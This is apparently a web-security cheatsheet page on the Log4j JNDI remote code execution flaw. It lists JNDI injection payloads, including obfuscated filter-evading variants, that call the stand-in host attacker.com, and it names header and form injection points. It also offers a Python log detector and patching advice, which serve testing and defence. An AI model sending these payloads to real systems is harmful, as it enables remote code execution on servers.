
Log4j

Web cheatsheet — Web application enumeration and exploitation techniques.

Overview

Log4j (CVE-2021-44228) is a critical remote code execution vulnerability in the Apache Log4j 2 logging library. An attacker who can get a crafted string into a logged message can inject a JNDI lookup, which the library resolves by contacting an attacker-controlled LDAP or RMI server, leading to arbitrary code execution on the host doing the logging.

The vulnerability is triggered whenever user-controlled input (User-Agent headers, form fields, etc.) ends up in a log message written by an application using Log4j versions 2.0 through 2.14.1; the input does not need to be parsed or stored by the application, only logged.

Category: Web

Key Commands & Payloads

The following commands and payloads are commonly used when testing for or exploiting Log4j:

${jndi:ldap://attacker.com/a}
${jndi:rmi://attacker.com/a}
${jndi:dns://attacker.com/a}
${${env:ENV_NAME:-j}ndi:ldap://attacker.com/a}
${::-j}ndi:ldap://attacker.com/a
${lower:j}ndi:ldap://attacker.com/a
${${::-j}${::-n}${::-d}${::-i}:ldap://attacker.com/a}
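
The obfuscated variants above defeat a naive substring match for "${jndi:". The following detector, added here as an example and not part of the original cheatsheet, normalizes a log line by resolving the trivial nested lookups (the ":-" default-value form, lower/upper) innermost-first until only the JNDI lookup remains, then flags the line. The sample log lines are constructed for the example; the resolution rules are a small subset of Log4j's lookup syntax, sufficient for the payload forms listed above.

```python
import re

# Matches the innermost ${...} lookup (a body containing no further braces).
_INNER = re.compile(r"\$\{([^{}]*)\}")

def _resolve(match):
    """Resolve one innermost lookup the way Log4j would, or keep it if it is JNDI."""
    body = match.group(1)
    if body.lower().startswith("jndi:"):
        return match.group(0)              # keep it: this is what we want to surface
    if ":-" in body:                        # ${lookup:key:-default}: unresolved -> default
        return body.split(":-", 1)[1]
    prefix, _, arg = body.partition(":")
    if prefix.lower() == "lower":
        return arg.lower()
    if prefix.lower() == "upper":
        return arg.upper()
    return ""                               # any other lookup treated as unresolved

def normalize(text, max_rounds=20):
    """Repeatedly resolve innermost lookups until the string stops changing."""
    for _ in range(max_rounds):
        new_text = _INNER.sub(_resolve, text)
        if new_text == text:
            return text
        text = new_text
    return text

def is_jndi_attempt(line):
    return "${jndi:" in normalize(line).lower()

def scan(lines):
    """Return (index, normalized line) for every line carrying a JNDI lookup."""
    return [(i, normalize(line)) for i, line in enumerate(lines) if is_jndi_attempt(line)]

# Constructed sample access-log lines; attacker.com is the placeholder used on this page.
SAMPLE_LOG = [
    '10.0.0.5 - - "GET / HTTP/1.1" 200 "-" "Mozilla/5.0"',
    '10.0.0.9 - - "GET / HTTP/1.1" 200 "-" "${jndi:ldap://attacker.com/a}"',
    '10.0.0.9 - - "GET /?q=${${::-j}${::-n}${::-d}${::-i}:ldap://attacker.com/a} HTTP/1.1" 400',
    '10.0.0.9 - - "GET / HTTP/1.1" 200 "-" "${${lower:j}ndi:${lower:rmi}://attacker.com/a}"',
]

if __name__ == "__main__":
    for idx, normalized in scan(SAMPLE_LOG):
        print(f"line {idx}: {normalized}")
```

Run it against real log files line by line; the normalized form is what you want to keep in the alert, since it shows the target scheme and host regardless of the obfuscation used.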

Tools & Techniques

Recommended techniques when testing for Log4j:

  • Inject into HTTP headers (User-Agent, X-Forwarded-For, Referer)
  • Inject into form data and URL parameters
  • Inject into any log message processed server-side
  • Blind detection with DNS callback collaborator
  • Use out-of-band LDAP/RMI server for payload delivery

Prevention & Mitigation

Security recommendations to prevent Log4j exploitation:

  • Update Log4j to version 2.17.0 or later immediately
  • Apply the -Dlog4j2.formatMsgNoLookups=true mitigation if patching is delayed (a stopgap only: older 2.x releases do not honour the property and it does not cover every lookup path, so it must not replace the upgrade)
  • Remove JndiLookup class from Log4j jar file
  • Use a Web Application Firewall to block JNDI injection payloads
  • Inventory all applications using Log4j in your environment

References

Additional resources: